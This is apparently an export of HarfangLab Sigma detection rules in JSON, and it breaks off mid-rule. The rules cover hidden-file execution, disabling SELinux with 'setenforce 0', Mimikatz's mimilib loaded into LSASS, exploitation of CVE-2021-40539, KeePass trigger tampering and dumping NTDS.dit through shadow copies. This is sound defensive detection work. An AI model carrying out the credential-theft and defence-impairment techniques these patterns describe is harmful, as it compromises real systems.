"content": "title: Hidden File Executed\nid: 89345982-a93f-4606-a99c-932da482d27d\ndescription: |\n Detects the execution of a hidden file.\n Adversaries may hide their files on the system in order to prevents users from spotting them or to evade system analysis tools that do not incorporate investigation of hidden files.\n It is recommended to check for suspicious activities by the newly created process.\nreferences:\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/04/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName|startswith: '.'\n\n # This is handled by the rule d44c6de2-d37f-4e36-8fa1-f23231dd7632\n filter_launchd:\n ProcessParentImage: '/sbin/launchd'\n\n exclusion_dropbox:\n - ProcessImage: '/Volumes/com.getdropbox.dropbox-*/.dbx_install'\n ProcessParentCommandLine: '/Users/*/Library/Dropbox/DropboxMacUpdate.app/Contents/MacOS/DropboxMacUpdate -check *'\n - ProcessCommandLine|startswith: '/volumes/dropbox offline installer/.install /volumes/dropbox offline installer /applications/dropbox.app'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: '.dbx_install'\n\n exclusion_google:\n ProcessCommandLine: '/Volumes/qual/.install /Volumes/qual/.install /Volumes/qual 0.1'\n ProcessParentCommandLine|startswith: 'GoogleUpdater --server --service=update-internal*'\n\n exclusion_edge:\n ProcessImage: '/Library/Application Support/Microsoft/EdgeUpdater/apps/msedge-qualify/*/.install'\n ProcessParentCommandLine|startswith: 'EdgeUpdater --server --service=update-internal*'\n\n exclusion_bug:\n ProcessName: './bin/perl'\n\n exclusion_mycloud:\n ProcessImage: '/private/var/folders/??/*/*/.com.wdc.discovery.mycloud.??????'\n\n exclusion_common_folders:\n ProcessImage|startswith:\n - '/System/Library/'\n - '/Library/Application Support/'\n - '/library/frameworks/'\n - '/Applications/'\n\n exclusion_apple_signed:\n ProcessSignatureSigningId|startswith: 'com.apple.'\n ProcessSigned: 'true'\n\n exclusion_nix:\n Image: '/nix/store/*-wrapped'\n\n exclusion_trendmicro:\n Image: '/Users/*/Library/Application Scripts/com.trendmicro.DrUnzip/.Log/DULog/.DS__Store'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89345982-a93f-4606-a99c-932da482d27d",
"rule_name": "Hidden File Executed",
"rule_description": "Detects the execution of a hidden file.\nAdversaries may hide their files on the system in order to prevents users from spotting them or to evade system analysis tools that do not incorporate investigation of hidden files.\nIt is recommended to check for suspicious activities by the newly created process.\n",
"rule_creation_date": "2024-04-03",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "893dbac9-4830-4f8f-a04e-0d27da61acaa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087354Z",
"creation_date": "2026-03-23T11:45:34.087356Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087360Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_disable_selinux.yml",
"content": "title: SELinux Disabled\nid: 893dbac9-4830-4f8f-a04e-0d27da61acaa\ndescription: |\n Detects the execution of the \"setenforce 0\" command, which disables SELinux. Attackers may use this to disable system-wide mandatory access control (MAC), allowing unauthorized access and privilege escalation.\n Disabling SELinux can facilitate data exfiltration, unauthorized file modifications, and persistence.\n It is recommended to investigate the source of the command execution, review system logs for signs of unauthorized access, and re-enable SELinux if the change was not authorized.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/09/22\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/setenforce'\n CommandLine|contains:\n - 'Permissive'\n - '0'\n\n exclusion_alfresco:\n - GrandparentCommandLine|startswith: '/bin/sh /etc/init.d/alfresco '\n - ParentCommandLine|startswith:\n - '/bin/sh /opt/alfresco-community/alfresco.sh '\n - '/bin/sh /opt/iParapheur/alfresco.sh '\n - '/bin/bash /etc/init.d/alfresco '\n - '/bin/sh /etc/init.d/alfresco '\n - '/bin/sh -c /etc/init.d/alfresco '\n - '/bin/sh /opt/alfresco/*/alfresco.sh '\n\n exclusion_dnf:\n GrandparentCommandLine: '/usr/bin/python3 /usr/bin/dnf --quiet -y upgrade'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "893dbac9-4830-4f8f-a04e-0d27da61acaa",
"rule_name": "SELinux Disabled",
"rule_description": "Detects the execution of the \"setenforce 0\" command, which disables SELinux. Attackers may use this to disable system-wide mandatory access control (MAC), allowing unauthorized access and privilege escalation.\nDisabling SELinux can facilitate data exfiltration, unauthorized file modifications, and persistence.\nIt is recommended to investigate the source of the command execution, review system logs for signs of unauthorized access, and re-enable SELinux if the change was not authorized.\n",
"rule_creation_date": "2021-09-22",
"rule_modified_date": "2025-02-04",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89c64e5b-2c44-4ba7-bc34-928ea7a40174",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084294Z",
"creation_date": "2026-03-23T11:45:34.084296Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084300Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz",
"https://attack.mitre.org/software/S0002/"
],
"name": "t1003_mimilib_loaded.yml",
"content": "title: LSASS DLL Hijacked via Mimikatz\nid: 89c64e5b-2c44-4ba7-bc34-928ea7a40174\ndescription: |\n Detects the loading of mimilib.dll into the Local Security Authority Subsystem Service (LSASS) process.\n This DLL is specifically designed to hook into LSASS memory to extract credentials, hashes, and Kerberos tickets. This technique requires administrative privileges and is commonly used in post-exploitation phases of an attack.\n It is recommended to investigate the source process that triggered the DLL load, the user context, and any subsequent network connections or file system activity that could indicate credential exfiltration.\nreferences:\n - https://github.com/gentilkiwi/mimikatz\n - https://attack.mitre.org/software/S0002/\ndate: 2021/03/03\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1078\n - attack.t1550.002\n - attack.t1550.003\n - attack.t1574.002\n - attack.s0002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_lsass:\n Image: '?:\\Windows\\System32\\lsass.exe'\n\n selection_mimikatz:\n - InternalName: 'mimilib'\n - OriginalFileName: 'mimilib.dll'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89c64e5b-2c44-4ba7-bc34-928ea7a40174",
"rule_name": "LSASS DLL Hijacked via Mimikatz",
"rule_description": "Detects the loading of mimilib.dll into the Local Security Authority Subsystem Service (LSASS) process.\nThis DLL is specifically designed to hook into LSASS memory to extract credentials, hashes, and Kerberos tickets. This technique requires administrative privileges and is commonly used in post-exploitation phases of an attack.\nIt is recommended to investigate the source process that triggered the DLL load, the user context, and any subsequent network connections or file system activity that could indicate credential exfiltration.\n",
"rule_creation_date": "2021-03-03",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1078",
"attack.t1550.002",
"attack.t1550.003",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89cb912c-bc9a-49a3-ba8e-0c446e538259",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598638Z",
"creation_date": "2026-03-23T11:45:34.598641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598649Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539",
"https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html",
"https://www.cisa.gov/uscert/ncas/alerts/aa21-259a"
],
"name": "cve_2021_40539_adselfservice_plus.yml",
"content": "title: ADSelfService Plus CVE-2021-40539 Vulnerability Exploited\nid: 89cb912c-bc9a-49a3-ba8e-0c446e538259\ndescription: |\n Detects a successful attempt at exploiting CVE-2021-40539 on ADSelfService Plus.\n ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n It is recommended to analyze processes executed by Java to determine their legitimacy as well as to look for other suspicious actions on the host.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539\n - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html\n - https://www.cisa.gov/uscert/ncas/alerts/aa21-259a\ndate: 2022/02/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.privilege_escalation\n - attack.t1574\n - cve.2021-40539\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.ADSelfService\n - classification.Windows.Exploit.CVE-2021-40539\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\java.exe'\n ParentCommandLine|contains: 'ManageEngineADSFramework'\n Image|endswith: '\\keytool.exe'\n # Hardcoded in ADSelfService Plus vulnerable codepath.\n CommandLine|contains: 'keytool.exe -J-Duser.language=en -genkey -alias tomcat -sigalg SHA256withRSA -keyalg RSA -keypass '\n\n selection_variant_keysize:\n CommandLine|contains:\n - '-providerpath'\n - '-providerclass'\n\n condition: selection and 1 of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89cb912c-bc9a-49a3-ba8e-0c446e538259",
"rule_name": "ADSelfService Plus CVE-2021-40539 Vulnerability Exploited",
"rule_description": "Detects a successful attempt at exploiting CVE-2021-40539 on ADSelfService Plus.\nADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\nIt is recommended to analyze processes executed by Java to determine their legitimacy as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2022-02-23",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "89d049a9-66b6-4aeb-a134-d85e0e408ace",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621070Z",
"creation_date": "2026-03-23T11:45:34.621072Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621077Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/alt3kx/CVE-2023-24055_PoC",
"https://keepass.info/help/kb/trigger_examples.html"
],
"name": "t1555_005_suspicious_keepass_configuration_modification.yml",
"content": "title: Suspicious KeePass Configuration File Modification\nid: 89d049a9-66b6-4aeb-a134-d85e0e408ace\ndescription: |\n Detects a suspicious modification of the KeePass configuration file.\n KeePass allows to configure triggers to automatically launch actions based on different events.\n Attackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate credentials to an attacker-controlled server.\n The CVE 2023-24055 is known to exploit this feature.\n It is recommended to investigate the other actions taken by the binary which made the modification, as well as potential suspicious authentications following this action.\nreferences:\n - https://github.com/alt3kx/CVE-2023-24055_PoC\n - https://keepass.info/help/kb/trigger_examples.html\ndate: 2023/03/08\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - attack.credential_access\n - attack.t1555.005\n - attack.collection\n - attack.t1119\n - attack.exfiltration\n - attack.t1020.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.CVE-2023-24055\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_write\ndetection:\n selection:\n Path|endswith: '\\KeePass.config.xml'\n ProcessParentImage|contains: '?'\n\n filter_keepass:\n - ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, Dominik Reichl'\n - ProcessImage:\n - '?:\\Program Files\\KeePass Password Safe 2\\KeePass.exe'\n - '?:\\Program Files (x86)\\KeePass Password Safe 2\\KeePass.exe'\n\n filter_keepass_msix_unsigned:\n ProcessCompany: 'Dominik Reichl'\n ProcessProduct: 'KeePass Password Safe'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sysytem:\n ProcessName: 'system'\n ProcessId: '4'\n\n # https://pleasantpasswords.com/\n exclusion_pleasant:\n ProcessOriginalFileName: 'KeePass.exe'\n ProcessCompany: 'Pleasant Solutions'\n\n exclusion_wapt:\n ProcessImage:\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpythonw.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files (x86)\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n\n exclusion_msiexec:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n ProcessCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_install:\n ProcessImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ProcessCommandLine|contains|all:\n - ' -ExecutionPolicy ByPass'\n - ' -File '\n - 'Install'\n ProcessParentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_deploytoolkit:\n ProcessParentImage:\n - '?:\\Windows\\ccmcache\\\\*\\Deploy-Application.exe'\n - '?:\\Windows\\IMECache\\\\*\\Deploy-Application.exe'\n\n exclusion_explorer:\n - ProcessImage: '?:\\Windows\\explorer.exe'\n ProcessParentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n - ProcessImage: '?:\\Windows\\explorer.exe'\n ProcessCommandLine|contains: '/factory,{'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_beyondcompare:\n ProcessImage: '?:\\Program Files\\Beyond Compare 4\\BCompare.exe'\n ProcessSignature: 'Scooter Software Inc'\n\n exclusion_symantec:\n ProcessOriginalFileName: 'ccSvcHst.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Symantec Corporation'\n\n exclusion_backup:\n ProcessImage:\n - '?:\\Windows\\System32\\VSSVC.exe'\n - '?:\\Windows\\System32\\Robocopy.exe'\n - '?:\\Windows\\System32\\xcopy.exe'\n\n exclusion_intune:\n ProcessParentImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Microsoft.Management.Services.IntuneWindowsAgent.exe'\n\n exclusion_transwiz:\n ProcessImage:\n - '?:\\ProgramData\\ForensiT\\Transwiz\\Deployment Files\\Transwiz.exe'\n - '?:\\Transwiz\\Transwiz.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "89d049a9-66b6-4aeb-a134-d85e0e408ace",
"rule_name": "Suspicious KeePass Configuration File Modification",
"rule_description": "Detects a suspicious modification of the KeePass configuration file.\nKeePass allows to configure triggers to automatically launch actions based on different events.\nAttackers can modify the KeePass configuration file KeePass.config.xml to add malicious triggers, for example, to exfiltrate credentials to an attacker-controlled server.\nThe CVE 2023-24055 is known to exploit this feature.\nIt is recommended to investigate the other actions taken by the binary which made the modification, as well as potential suspicious authentications following this action.\n",
"rule_creation_date": "2023-03-08",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.exfiltration",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1020.001",
"attack.t1119",
"attack.t1546",
"attack.t1555.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8a001854-f3b2-4a21-81af-df74ddf642d2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624436Z",
"creation_date": "2026-03-23T11:45:34.624438Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624442Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/003/"
],
"name": "t1003_003_ntds_file_access_shadowcopy.yml",
"content": "title: NTDS Database Dumped from Volume Shadow Copy\nid: 8a001854-f3b2-4a21-81af-df74ddf642d2\ndescription: |\n Detects accesses to the NTDS.dit file inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to dump the Active Directory Database for credential access.\n It is recommended to investigate the process trying to access the NTDS database for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\ndate: 2023/06/26\nmodified: 2025/12/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n Path|endswith: '\\Windows\\NTDS\\ntds.dit'\n\n selection_remote_system:\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr: 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_dell:\n ProcessImage:\n - '?:\\Program Files\\Dell\\SARemediation\\agent\\DellSupportAssistRemedationService.exe'\n - '?:\\Program Files (x86)\\Dell\\SARemediation\\agent\\DellSupportAssistRemedationService.exe'\n - '?:\\Program Files (x86)\\Dell Backup and Recovery\\SftService.exe'\n\n exclusion_eset:\n ProcessImage: '*\\ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_mcafee:\n ProcessImage:\n - '?:\\Program Files\\Common Files\\McAfee\\SystemCore\\mcshield.exe'\n - '?:\\Program Files (x86)\\Common Files\\McAfee\\SystemCore\\mcshield.exe'\n - '?:\\Program Files\\McAfee\\Agent\\masvc.exe'\n - '?:\\Program Files (x86)\\McAfee\\Agent\\masvc.exe'\n\n exclusion_trend:\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe'\n - '?:\\Program Files\\Trend Micro\\Cloud Endpoint\\CloudEndpointService.exe'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender*\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender*\\platform\\\\*\\MsSense.exe'\n\n exclusion_sophos:\n ProcessImage:\n - '?:\\Program Files\\Sophos\\Endpoint Defense\\SSPService.exe'\n - '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\ALUpdate.exe'\n - '?:\\Program Files (x86)\\Sophos\\Sophos Anti-Virus\\SavService.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_timenavigator:\n ProcessImage:\n - '?:\\Program Files\\Atempo\\TimeNavigator\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files (x86)\\Atempo\\TimeNavigator\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files\\Atempo\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files (x86)\\Atempo\\tina\\Bin\\tina_bck.exe'\n - '?:\\Program Files\\Atempo\\TimeNavigator\\windows\\Bin\\tina_bck.exe'\n - '?:\\Program Files (x86)\\Atempo\\TimeNavigator\\windows\\Bin\\tina_bck.exe'\n\n #exclusion_clbackup:\n # ProcessImage:\n # - '?:\\Program Files\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n # - '?:\\Program Files (x86)\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n # - '?:\\Program Files\\Commvault\\ContentStore2\\Base\\CLBackup.exe'\n # - '?:\\Program Files (x86)\\Commvault\\ContentStore2\\Base\\CLBackup.exe'\n # - '?:\\Program Files\\CommVault\\Simpana\\Base\\CLBackup.exe'\n # - '?:\\Program Files (x86)\\CommVault\\Simpana\\Base\\CLBackup.exe'\n exclusion_clbackup:\n ProcessOriginalFileName: 'clBackup.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_lenovo:\n ProcessImage:\n - '?:\\Program Files (x86)\\Lenovo\\Rescue and Recovery\\br_funcs.exe'\n - '?:\\Program Files\\Lenovo\\Rescue and Recovery\\br_funcs.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n ProcessCommandLine|contains|all:\n - 'activate'\n - 'instance'\n\n exclusion_backup_exec:\n ProcessImage:\n - '?:\\Program Files\\SYMANTEC\\BACKUP EXEC\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\beremote.exe'\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n\n exclusion_avamar:\n ProcessImage:\n - '?:\\Program Files\\avs\\bin\\avtar.exe'\n - '?:\\Program Files (x86)\\avs\\bin\\avtar.exe'\n\n exclusion_netbackup:\n ProcessImage: '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n\n exclusion_sentinelone:\n ProcessImage: '?:\\Program Files\\SentinelOne\\Sentinel Agent *\\SentinelAgent.exe'\n\n exclusion_burp:\n ProcessImage: '?:\\Program Files\\Burp\\bin\\burp.exe'\n\n # C:\\Windows\\system32\\ESENTUTL.EXE /k /tC:\\Program Files\\Veritas\\Backup Exec\\RAWS\\logs \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy79\\Windows\\NTDS\\ntds.dit\n exclusion_esentutl_various:\n ProcessImage: '?:\\Windows\\System32\\esentutl.exe'\n ProcessParentImage:\n - '?:\\Program Files\\SYMANTEC\\BACKUP EXEC\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\RAWS\\beremote.exe'\n - '?:\\Program Files\\Veritas\\Backup Exec\\beremote.exe'\n - '?:\\Program Files\\Veritas\\NetBackup\\bin\\bpbkar32.exe'\n\n exclusion_trusted_installer:\n ProcessImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: 